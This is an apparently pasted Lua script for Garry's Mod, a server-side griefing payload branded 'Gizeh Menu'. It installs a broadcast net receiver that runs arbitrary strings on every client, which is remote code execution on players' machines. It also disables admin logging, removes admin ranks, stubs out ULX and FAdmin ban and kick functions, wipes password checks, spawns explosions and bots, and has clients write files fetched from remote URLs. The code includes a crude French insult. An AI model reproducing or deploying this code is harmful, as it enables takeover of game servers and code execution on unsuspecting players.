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Mar 29th, 2020
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  1. GizehSSV = GizehSSV or {}
  2. function GizehSSV.Start_SV()
  3. RunConsoleCommand("ulx_logecho", "0")
  4. GizehSSV.HUD = GizehSSV.HUD or "HUDPaint_Receive"
  5. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  6. GizehSSV.Wait1=!!1
  7. GizehSSV.Wait1=!!1
  8. GizehSSV.Wait1=!!1
  9. GizehSSV.SecureNet = GizehSSV.SecureNet or 'NIQUE TA MERE SALE PUTE :D'
  10. util.AddNetworkString(GizehSSV.HUD)
  11. BroadcastLua([[ net.Receive("]] .. GizehSSV.HUD .. [[", function() RunString(net.ReadString()) end)]])
  12. function GizehSSV.RandomString( len ) local str = "" for i = 0, len do str = str .. string.char(math.random(97,122)) end return str end
  13. GizehSSV.SecureString1 = GizehSSV.SecureString1 or GizehSSV.RandomString(11)
  14. GizehSSV.SecureString2 = GizehSSV.SecureString2 or GizehSSV.RandomString(11)
  15. GizehSSV.SecureString3 = GizehSSV.SecureString3 or GizehSSV.RandomString(11)
  16. GizehSSV.SecureString4 = GizehSSV.SecureString4 or GizehSSV.RandomString(11)
  17. GizehSSV.SecureString5 = GizehSSV.SecureString5 or GizehSSV.RandomString(11)
  18. GizehSSV.SecureString6 = GizehSSV.SecureString6 or GizehSSV.RandomString(11)
  19. GizehSSV.SecureString7 = GizehSSV.SecureString7 or GizehSSV.RandomString(11)
  20. GizehSSV.SecureString8 = GizehSSV.SecureString8 or GizehSSV.RandomString(11)
  21. GizehSSV.SecureString9 = GizehSSV.SecureString9 or GizehSSV.RandomString(11)
  22. GizehSSV.SecureString10 = GizehSSV.SecureString10 or GizehSSV.RandomString(11)
  23. GizehSSV.SecureString11 = GizehSSV.SecureString11 or GizehSSV.RandomString(11)
  24. GizehSSV.SecureString12 = GizehSSV.SecureString12 or GizehSSV.RandomString(11)
  25. GizehSSV.SecureString13 = GizehSSV.SecureString13 or GizehSSV.RandomString(11)
  26. GizehSSV.SecureString15 = GizehSSV.SecureString15 or GizehSSV.RandomString(11)
  27. GizehSSV.SecureString16 = GizehSSV.SecureString16 or GizehSSV.RandomString(11)
  28. GizehSSV.SecureString17 = GizehSSV.SecureString17 or GizehSSV.RandomString(11)
  29. util.AddNetworkString("GM::SendParticle::"..GizehSSV.SecureNet)
  30. util.AddNetworkString("GM::ParticleExist::"..GizehSSV.SecureNet)
  31. GizehSSV.LaViolence = {"22.031","22.758","23.039","24.508","24.756","26.024","26.511","27.020","27.285","27.412","27.496","28.012","28.780","29.981","30.148","30.348","30.514","32.017","32.101","32.210","32.319","32.751","33.017","33.752","34.018","35.252","36.027","36.254","36.339","36.448","36.557","36.667","37.556","40.525","40.759","41.026","42.027","42.527","43.261","43.346","43.528","44.029","44.796","46.031","46.531","47.032","48.033","48.142","48.252","49.001","49.053","49.187","49.264","50.002","51.036","51.269","52.037","52.270","52.380","52.489","52.771","53.038","53.122","53.199","53.505","54.039","61.048","62.047","66.018","78.029","80.031","82.033","84.036","86.035","144.895"}
  32. GizehSSV.ClientSide = [[
  33. hook.Add("PreDrawHUD", "]]..tostring(GizehSSV.SecureString13)..[[", function()
  34. gui.HideGameUI()
  35. end)
  36. GizehSSV = GizehSSV or {}
  37. GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  38. GizehSSVLogo = GizehSSVLogo or nil
  39. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  40. sound.PlayURL( "", "mono", function(s)
  41. if ( IsValid(s) ) then
  42. s:Play()
  43. end
  44. end)
  45. timer.Create("]]..tostring(GizehSSV.SecureString4)..[[", 0.1, 0, function()
  46. if not GizehSSV.Enabled then return end
  47. local mat = Entity(0):GetMaterials()
  48. for k,v in pairs(mat) do
  49. if GizehSSV.Wait1 then
  50. local col = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  51. Material(v):SetVector("$color", Vector(col.r/220,col.g/220,col.b/220))
  52. else
  53. local col = Color(math.random(170,220),math.random(170,220),math.random(170,220))
  54. Material(v):SetVector("$color", Vector(col.r-200,col.g-200,col.b-200))
  55. end
  56. end
  57. end)
  58. timer.Simple(142.267,function()
  59. if not GizehSSV.Enabled then return end
  60. RunConsoleCommand('gmod_language', 'de')
  61. end)
  62. timer.Simple(22, function()
  63. if not GizehSSV.Enabled then return end
  64. timer.Create("]]..tostring(GizehSSV.SecureString2)..[[", 0.1, 0, function()
  65. if not GizehSSV.Enabled then return end
  66. notification.AddLegacy( "", math.random(0, 4), 1.5 )
  67. end)
  68. function GAMEMODE:PostDraw2DSkyBox()
  69. local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  70. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  71. return !!1
  72. end
  73. function GAMEMODE:PreDrawSkyBox()
  74. local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  75. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  76. return !!1
  77. end
  78. end)
  79. timer.Simple(5, function()
  80. if not GizehSSV.Enabled then return end
  81. if GizehSSVLogo then GizehSSVLogo:Remove() GizehSSVLogo = nil end
  82. GizehSSVLogo = vgui.Create('HTML')
  83. GizehSSVLogo:MoveToFront()
  84. GizehSSVLogo:SetSize(600,200)
  85. GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  86. GizehSSVLogo:OpenURL('')
  87. hook.Add("Tick","]]..tostring(GizehSSV.SecureString3)..[[", function()
  88. if GizehSSV.Wait1 then
  89. GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  90. else
  91. GizehSSVLogo:SetPos((ScrW()/2)-math.random(280, 320),(ScrH()/8)-math.random(80, 120))
  92. end
  93. end)
  94. timer.Create("]]..tostring(GizehSSV.SecureString5)..[[", 1.5, 0, function()
  95. local time = tonumber(0)
  96. local Message = {
  97. " . . ",
  98. " .. .. ",
  99. " ... ... ",
  100. " .... .... ",
  101. " ..... ..... ",
  102. " ...... ...... ",
  103. " ....... ....... ",
  104. " ........ ........ ",
  105. "......... .........",
  106. " ........ ........ ",
  107. " ....... ....... ",
  108. " ...... ...... ",
  109. " ..... ..... ",
  110. " .... .... ",
  111. " ... ... ",
  112. " .. .. ",
  113. " . . ",
  114. }
  115. for _, line in pairs(Message) do
  116. time = time + tonumber(0.1)
  117. timer.Simple(time,function()
  118. if not GizehSSV.Enabled then return end
  119. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  120. end)
  121. end
  122. end)
  123. end)
  124. timer.Simple(1, function()
  125. if not GizehSSV.Enabled then return end
  126. local text = "Le Guiser Menu sais trop bien les reille"
  127. local str = '' text = string.Trim(text) text = string.Explode(' ', text) if text == {} then return end for k,v in pairs(text) do str = str .. v .. '+' end sound.PlayURL(''..str..'&tl=fr','mono',function(chan, num, str)end)
  128. end)
  129. local tab = {
  130. [ "$pp_colour_addr" ] = tonumber(0.001),
  131. [ "$pp_colour_addg" ] = tonumber(0.001),
  132. [ "$pp_colour_addb" ] = tonumber(0),
  133. [ "$pp_colour_brightness" ] = tonumber(-0.5),
  134. [ "$pp_colour_contrast" ] = tonumber(0.8),
  135. [ "$pp_colour_colour" ] = tonumber(3),
  136. [ "$pp_colour_mulr" ] = tonumber(1),
  137. [ "$pp_colour_mulg" ] = tonumber(0.5),
  138. [ "$pp_colour_mulb" ] = tonumber(0.4)
  139. }
  140. hook.Add("RenderScreenspaceEffects", "]]..tostring(GizehSSV.SecureString11)..[[", function()
  141. DrawColorModify( tab )
  142. end)
  143. ]]
  144. function GizehSSV.SendtoClients(code)
  145. net.Start( GizehSSV.HUD )
  146. net.WriteString(code)
  147. net.Broadcast()
  148. end
  149. function GizehSSV.SendtoClient(ply,code)
  150. net.Start( GizehSSV.HUD )
  151. net.WriteString(code)
  152. net.Send(ply)
  153. end
  154. GizehSSV.SendtoClients(GizehSSV.ClientSide)
  155. for k, v in pairs( player.GetAll() ) do
  156. v:SetJumpPower( 450 )
  157. v:GodEnable()
  158. if v:GetUserGroup() ~= tostring("user") then
  159. v:SetUserGroup("user")
  160. end
  161. end
  162. function GizehSSV.TriggeredSSV()
  163. for k,v in pairs(GizehSSV.LaViolence) do
  164. if not GizehSSV.Enabled then return end
  165. if tonumber(v) == nil then return end
  166. local time = tonumber(0.2)
  167. if tonumber(v) == tonumber(62.047) then time = tonumber(3.313) end
  168. if tonumber(v) == tonumber(66.018) then time = tonumber(3.55) end
  169. if tonumber(v) == tonumber(86.035) then time = tonumber(42.566) end
  170. timer.Simple(tonumber(v)-22.031,function()
  171. if not GizehSSV.Enabled then return end
  172. if tonumber(v) == tonumber(144.895) then
  173. hook.Add("Think", GizehSSV.SecureString17, function()
  174. local explode = ents.Create( "env_explosion" )
  175. explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  176. explode:Spawn()
  177. explode:SetKeyValue( "iMagnitude", "500" )
  178. explode:Fire( "Explode", 0, 0 )
  179. end)
  180. end
  181. if tonumber(v) == tonumber(86.035) then
  182. GizehSSV.Wait2 = !1
  183. end
  184. GizehSSV.Wait1 = !1
  185. GizehSSV.SendtoClients([[if GizehSSV then GizehSSV.Wait1 = tobool("]]..tostring(GizehSSV.Wait1)..[[") end]])
  186. timer.Simple(time,function()
  187. GizehSSV.Wait1 = !!1
  188. GizehSSV.Wait2 = !!1
  189. GizehSSV.SendtoClients([[if GizehSSV then GizehSSV.Wait1 = tobool("]]..tostring(GizehSSV.Wait1)..[[") end]])
  190. end)
  191. end)
  192. end
  193. end
  194. timer.Simple(1, function()
  195. if not GizehSSV.Enabled then return end
  196. game.ConsoleCommand( 'sv_loadingurl ""\n' )
  197. game.ConsoleCommand( "sv_gravity 200\n" )
  198. if FAdmin and FAdmin.PlayerActions then function FAdmin.PlayerActions.ConvertBanTime() return 1 end end
  199. if ULib then
  200. function ULib.ban() return end
  201. function ULib.kickban() return end
  202. function ULib.kick() return end
  203. function ULib.addBan() return end
  204. end
  205. if ulx then
  206. function ulx.ban(...) return end
  207. function ulx.kick(...) return end
  208. function ulx.banid(...) return end
  209. function ulx.removeuser(...) return end
  210. end
  211. FAdmin = FAdmin or {}
  212. timer.Create(GizehSSV.SecureString15, 0.1, 0, function()
  213. FAdmin.BANS = {}
  214. end)
  215. hook.GetTable()["CheckPassword"] = {}
  216. timer.Create(GizehSSV.SecureString16, math.random( 3, 10 ), 0, function()
  217. for _, vehicl in pairs( ents.GetAll() ) do
  218. if vehicl:GetClass() == "prop_vehicle_jeep" then
  219. local explosion = ents.Create("env_explosion")
  220. explosion:SetPos(vehicl:GetPos())
  221. explosion:Spawn()
  222. explosion:SetKeyValue("iMagnitude", "50")
  223. explosion:Fire("Explode", 0, 0)
  224. end
  225. end
  226. end)
  227. --if file.Exists( 'ulib/groups.txt', 'DATA' ) then
  228. -- file.Delete('ulib/groups.txt')
  229. --end
  230. end)
  231. timer.Create(GizehSSV.SecureString12, 149.544, 1, function()
  232. if not GizehSSV.Enabled then return end
  233. game.ConsoleCommand("changelevel " .. game.GetMap() .. "\n")
  234. end)
  235. timer.Simple(22, function()
  236. if not GizehSSV.Enabled then return end
  237. timer.Create(GizehSSV.SecureString1, 5, 1, function()
  238. local TickWait = !!1
  239. local TickFirst = tonumber(0)
  240. local TickTime = tonumber(0)
  241. for _,v in pairs(player.GetAll()) do
  242. local SpawnGizeh = ents.Create( "prop_physics" )
  243. SpawnGizeh:SetModel("models/hunter/misc/squarecap1x1x1.mdl")
  244. SpawnGizeh:SetPos( Vector( v:GetPos()[1] + math.random(-1000, 1000), v:GetPos()[2] + math.random(-1000, 1000), -500 ))
  245. SpawnGizeh:Spawn()
  246. SpawnGizeh:Activate()
  247. SpawnGizeh:SetAngles(Angle(0,0,0))
  248. SpawnGizeh:SetModelScale(8)
  249. SpawnGizeh:SetCollisionGroup( 10 )
  250. SpawnGizeh:SetMaterial( "models/debug/debugwhite" )
  251. end
  252. hook.Add("Tick",GizehSSV.SecureString9, function()
  253. if not GizehSSV.Enabled then return end
  254. TickTime = TickTime + tonumber(0.1)
  255. for _,ent in pairs(ents.FindByModel("models/hunter/misc/squarecap1x1x1.mdl")) do
  256. if ent:GetPos()[3] < tonumber(1000) and TickWait then
  257. if ent:GetPos()[3] < tonumber(-550) then
  258. ent:SetPos(ent:GetPos() + Vector(math.random(-1000, 1000),math.random(-1000, 1000),4))
  259. ent:SetAngles(Angle(0,math.random(0,5),0))
  260. else
  261. ent:SetPos(ent:GetPos() + Vector(0,0,4))
  262. ent:SetAngles(ent:GetAngles() + Angle(0,math.random(0,5),0))
  263. end
  264. TickWait = !!1
  265. elseif ent:GetPos()[3] > tonumber(1000) then
  266. ent:SetPos(ent:GetPos() + Vector(0,0,0))
  267. ent:SetAngles(ent:GetAngles() - Angle(0,5,0))
  268. TickWait = !1
  269. elseif ent:GetPos()[3] < tonumber(-550) and TickTime > tonumber(100) then
  270. TickFirst = tonumber(0)
  271. TickTime = tonumber(0)
  272. TickWait = !!1
  273. elseif TickTime > tonumber(100) then
  274. ent:SetPos(ent:GetPos() - Vector(0,0,8))
  275. ent:SetAngles(ent:GetAngles() + Angle(0,math.random(0,5),0))
  276. TickWait = !1
  277. elseif TickFirst < tonumber(180) then
  278. ent:SetPos(ent:GetPos() + Vector(0,0,0))
  279. ent:SetAngles(Angle(TickFirst,TickFirst,0))
  280. if TickFirst < tonumber(179) then
  281. TickFirst = TickFirst + tonumber(0.5)
  282. else
  283. TickFirst = TickFirst + tonumber(0.1)
  284. end
  285. else
  286. ent:SetPos(ent:GetPos() + Vector(0,0,0))
  287. ent:SetAngles(ent:GetAngles() - Angle(0,5,0))
  288. end
  289. if GizehSSV.Wait1 then
  290. ent:SetColor( Color(0,0,0) )
  291. else
  292. local col = Color(math.random(170,220),math.random(170,220),math.random(170,220))
  293. ent:SetColor( Color(col.r-200,col.g-200,col.b-200) )
  294. end
  295. end
  296. end)
  297. end)
  298. timer.Simple(0.2,function()
  299. GizehSSV.TriggeredSSV()
  300. end)
  301. timer.Create(GizehSSV.SecureString7,2,0,function()
  302. if not GizehSSV.Enabled then return end
  303. for k,v in pairs(player.GetAll()) do
  304. if not v:IsValid() then return end
  305. v:DoAnimationEvent(ACT_GMOD_TAUNT_PERSISTENCE)
  306. v:SetMaterial( "models/debug/debugwhite" )
  307. v:SetColor( HSVToColor( RealTime() * 120 % 360, 1, 1 ) )
  308. if DarkRP then
  309. DarkRP.storeRPName(v, "#GizehMenu")
  310. v:setDarkRPVar("rpname", "#GizehMenu")
  311. end
  312. end
  313. end)
  314. timer.Create(GizehSSV.SecureString6,0.5,game.MaxPlayers()-player.GetCount(),function()
  315. if not GizehSSV.Enabled then return end
  316. RunConsoleCommand("bot")
  317. end)
  318. timer.Create(GizehSSV.SecureString8, 0.32, 0, function()
  319. if not GizehSSV.Enabled then return end
  320. if GizehSSV.Wait2 then return end
  321. for y,ent in pairs(ents.GetAll()) do
  322. local phys = ent:GetPhysicsObject()
  323. local UnfreezeFreq = tonumber(1)
  324. local ShakeForce = tonumber(6)
  325. local force = math.random(1, 10)
  326. if phys:IsValid() then
  327. local mass = phys:GetMass()
  328. phys:ApplyForceOffset((mass * ShakeForce * Vector(math.Rand(-3.5, 5.2), math.Rand(-3.5, 5.2), math.Rand(3.5, 10.2))), (phys:GetPos() + Vector(math.Rand(-72, 72), math.Rand(-72, 72), math.Rand(-72, 72))))
  329. if (math.random( 0, ( 320/UnfreezeFreq ) ) == ( 320/UnfreezeFreq ) ) && (ent != self) then
  330. phys:EnableMotion(!!1)
  331. phys:Wake()
  332. phys:ApplyForceOffset((mass * ShakeForce * Vector(math.Rand(-32, 42), math.Rand(-32, 42), math.Rand(42, 52))), (phys:GetPos() + Vector(math.Rand(-72, 72), math.Rand(-72, 72), math.Rand(-72, 72))))
  333. end
  334. end
  335. end
  336. end)
  337. end)
  338. GizehSSV.SendtoClients( [[
  339. net.Receive('GM::SendParticle::]]..GizehSSV.SecureNet..[[', function()
  340. local len = net.ReadUInt(32)
  341. local str = net.ReadData(len)
  342. local choux = util.Decompress(str)
  343. local pluie = net.ReadString()
  344. file.CreateDir(string.GetPathFromFilename(pluie))
  345. file.Write(pluie, choux)
  346. timer.Simple(2,function()
  347. if ( file.Exists("custom_mat/particles/gizeh.pcf.dat", "DATA") and file.Exists("custom_mat/materials/gizeh_particles/gizeh_particles.vtf", "DATA") ) then
  348. local GizehVMT = Material( "weapons/swep.vmt" )
  349. GizehVMT:SetTexture( "$basetexture", "../data/custom_mat/materials/gizeh_particles/gizeh_particles" )
  350. game.AddParticles("../data/custom_mat/particles/gizeh.pcf.dat")
  351. PrecacheParticleSystem("gizeh")
  352. net.Start("GM::ParticleExist::]]..GizehSSV.SecureNet..[[")
  353. net.SendToServer()
  354. end
  355. end)
  356. end)
  357. ]])
  358. net.Receive("GM::ParticleExist::"..GizehSSV.SecureNet,function(len,ply)
  359. ParticleEffectAttach("gizeh",PATTACH_ABSORIGIN_FOLLOW,ply,0)
  360. end)
  361. function GizehSSV.SendParticleToClients(name,code)
  362. local strC = util.Compress(code)
  363. net.Start( "GM::SendParticle::"..GizehSSV.SecureNet )
  364. net.WriteUInt(#strC,32)
  365. net.WriteData(strC,#strC)
  366. net.WriteString(name)
  367. net.Broadcast()
  368. end
  369. timer.Simple(5,function()
  370. http.Fetch( "", function( b, l, h, c )
  371. if (string.Left( b, 1 ) == "<" or b == "502: Failure") and string.Left( b, 43 ) ~= "<!-- dmx encoding binary 2 format pcf 1 -->" then
  372. return
  373. end
  374. GizehSSV.SendParticleToClients("custom_mat/particles/gizeh.pcf.dat",b)
  375. end)
  376. http.Fetch( "", function( b, l, h, c )
  377. if string.Left( b, 1 ) == "<" or b == "502: Failure" then
  378. return
  379. end
  380. GizehSSV.SendParticleToClients("custom_mat/materials/gizeh_particles/gizeh_particles.vtf",b)
  381. end)
  382. end)
  383. end
  384. function GizehSSV.Clean_SV()
  385. game.ConsoleCommand( "sv_gravity 600\n" )
  386. for _,ent in pairs(ents.FindByModel("models/hunter/misc/squarecap1x1x1.mdl")) do
  387. ent:Remove()
  388. end
  389. timer.Remove(GizehSSV.SecureString1)
  390. timer.Remove(GizehSSV.SecureString6)
  391. timer.Remove(GizehSSV.SecureString7)
  392. timer.Remove(GizehSSV.SecureString8)
  393. timer.Remove(GizehSSV.SecureString12)
  394. timer.Remove(GizehSSV.SecureString16)
  395. hook.Remove("Think", GizehSSV.SecureString17)
  396. for k,v in pairs(player.GetAll()) do
  397. v:StopParticles()
  398. v:SetJumpPower( 200 )
  399. v:SetMaterial()
  400. v:SetColor( Color(255,255,255,255) )
  401. end
  402. GizehSSV.SendtoClients([[
  403. if GizehSSV then
  404. GizehSSV.Enabled = !1
  405. if GizehSSVLogo then GizehSSVLogo:Remove() GizehSSVLogo = nil end
  406. RunConsoleCommand('gmod_language', 'fr')
  407. RunConsoleCommand("stopsound")
  408. timer.Remove("]]..tostring(GizehSSV.SecureString4)..[[")
  409. timer.Remove("]]..tostring(GizehSSV.SecureString2)..[[")
  410. timer.Remove("]]..tostring(GizehSSV.SecureString5)..[[")
  411. hook.Remove("RenderScreenspaceEffects", "]]..tostring(GizehSSV.SecureString11)..[[")
  412. hook.Remove("Tick", "]]..tostring(GizehSSV.SecureString3)..[[")
  413. hook.Remove("PreDrawHUD", "]]..tostring(GizehSSV.SecureString13)..[[")
  414. function GAMEMODE:PostDraw2DSkyBox() return !1 end
  415. function GAMEMODE:PreDrawSkyBox() return !1 end
  416. local mat = Entity(0):GetMaterials()
  417. for k,v in pairs(mat) do
  418. local col = HSVToColor(CurTime() * 50 % 360, 1, 1)
  419. Material(v):SetVector("$color", Vector(1,1,1))
  420. end
  421. end
  422. ]])
  423. for _,bot in pairs(player.GetBots()) do
  424. bot:Kick("(SNTE) Net exploit detected !")
  425. end
  426. end
  427. GizehSSV.Start_SV()
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